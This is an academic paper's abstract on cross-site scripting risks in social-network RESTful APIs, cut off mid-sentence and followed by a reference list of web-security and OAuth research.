Cross-Site Scripting Attacks in Social Network APIs

Nowadays, it is becoming more popular that RESTful APIs are used by web developers to enhance the functionality of websites. However, this might raise potential XSS attack threats. Unlike traditional XSS attacks, XSS attacks in this scenario may take advantage of more characteristics of RESTful APIs. RESTful APIs are common in social networks. Consequently, in this paper, we took social networks as motivating examples to illustrate XSS attacks in

[1]  V. N. Venkatakrishnan,et al.  XSS-GUARD: Precise Dynamic Prevention of Cross-Site Scripting Attacks , 2008, DIMVA.

[2]  Roy Fielding,et al.  Architectural Styles and the Design of Network-based Software Architectures"; Doctoral dissertation , 2000 .

[3]  Wenke Lee,et al.  xBook: Redesigning Privacy Control in Social Networking Platforms , 2009, USENIX Security Symposium.

[4]  Adam Barth,et al.  Protecting Browsers from Extension Vulnerabilities , 2010, NDSS.

[5]  Steve Hanna,et al.  A Symbolic Execution Framework for JavaScript , 2010, 2010 IEEE Symposium on Security and Privacy.

[6]  David M. Nicol,et al.  unFriendly: Multi-party Privacy Risks in Social Networks , 2010, Privacy Enhancing Technologies.

[7]  Steve Hanna,et al.  FLAX: Systematic Discovery of Client-side Validation Vulnerabilities in Rich Web Applications , 2010, NDSS.

[8]  D. Recordon,et al.  The OAuth 2.0 Authorization Protocol: Bearer Tokens draft-ietf-oauth-v2-bearer-10 , 2012 .

[9]  XiaoFeng Wang,et al.  InteGuard: Toward Automatic Protection of Third-Party Web Service Integrations , 2013, NDSS.

[10]  A. Felt Privacy Protection for Social Networking APIs , 2008 .

[11]  Ulrik Brandes,et al.  Social Networks , 2013, Handbook of Graph Drawing and Visualization.

[12]  Hao Chen,et al.  Noncespaces: Using Randomization to Enforce Information Flow Tracking and Thwart Cross-Site Scripting Attacks , 2009, NDSS.

[13]  Jin-Cherng Lin,et al.  The Automatic Defense Mechanism for Malicious Injection Attack , 2007, 7th IEEE International Conference on Computer and Information Technology (CIT 2007).

[14]  Christopher Krügel,et al.  Saner: Composing Static and Dynamic Analysis to Validate Sanitization in Web Applications , 2008, 2008 IEEE Symposium on Security and Privacy (sp 2008).

[15]  Dawn Xiaodong Song,et al.  A Systematic Analysis of XSS Sanitization in Web Application Frameworks , 2011, ESORICS.

[16]  Prabath Siriwardena,et al.  OAuth 2.0 , 2014 .

[17]  Dawn Xiaodong Song,et al.  Document Structure Integrity: A Robust Basis for Cross-site Scripting Defense , 2009, NDSS.

[18]  V. N. Venkatakrishnan,et al.  Blueprint: Robust Prevention of Cross-site Scripting Attacks for Existing Browsers , 2009, 2009 30th IEEE Symposium on Security and Privacy.

[19]  Christopher Krügel,et al.  Noxes: a client-side solution for mitigating cross-site scripting attacks , 2006, SAC '06.

[20]  Joachim Posegga,et al.  XSSDS: Server-Side Detection of Cross-Site Scripting Attacks , 2008, 2008 Annual Computer Security Applications Conference (ACSAC).

[21]  Engin Kirda,et al.  Quo Vadis? A Study of the Evolution of Input Validation Vulnerabilities in Web Applications , 2011, Financial Cryptography.

[22]  Dan Boneh,et al.  XCS: cross channel scripting and its impact on web applications , 2009, CCS.

[23]  Rui Wang,et al.  How to Shop for Free Online -- Security Analysis of Cashier-as-a-Service Based Web Stores , 2011, 2011 IEEE Symposium on Security and Privacy.

[24]  Hossein Saidi,et al.  Social Networks' XSS Worms , 2009, 2009 International Conference on Computational Science and Engineering.

[25]  Benjamin Livshits,et al.  Spectator: Detection and Containment of JavaScript Worms , 2008, USENIX Annual Technical Conference.

[26]  Zhendong Su,et al.  Client-Side Detection of XSS Worms by Monitoring Payload Propagation , 2009, ESORICS.

[27]  Eran Hammer-Lahav,et al.  The OAuth 1.0 Protocol , 2010, RFC.

[28]  Lei Liu,et al.  Chrome Extensions: Threat Analysis and Countermeasures , 2012, NDSS.